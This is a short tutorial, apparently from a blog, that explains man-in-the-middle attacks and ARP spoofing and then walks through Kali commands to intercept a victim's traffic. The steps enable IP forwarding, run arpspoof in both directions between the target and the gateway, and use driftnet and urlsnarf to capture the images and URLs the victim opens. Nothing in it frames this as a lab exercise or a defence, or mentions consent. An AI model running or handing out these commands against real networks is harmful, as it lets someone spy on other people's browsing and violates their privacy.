A man in the middle attack is simply someone sitting in between your browser and a legitimate website. Data can be altered or snooped on during this.

Arp spoofing is the process of making machines on your network believe you are the gateway. Thus all data flows through you and vice versa.

Man in the middle

Today we’ll be looking at how to perform a Man In The Middle to capture images and urls by the victim.

Requirements are Kali 2

1. Open 3 terminals

Three terminals

2. Set up port forwarding

Run this command and if the output is 0 then we need to change it to 1

$ cat /proc/sys/net/ipv4/ip_forward

$ echo 1 >> /proc/sys/net/ipv4/ip_forward

Step 2

3. Run arpspoof


$ arpspoof -i eth0 targetiphere gatewayiphere

step 3

and then in another terminal

$ arpspoof -i eth0 gatewayiphere targetiphere

step 4

4. Run driftnet

This will capture images opened by the victim and display them in the black box.

$ driftnet -i eth0

step 5

Bonus: Run urlsnarf to capture http requests

$ urlsnarf -i eth0

Or simply open up Wireshark and capture packets passing through you.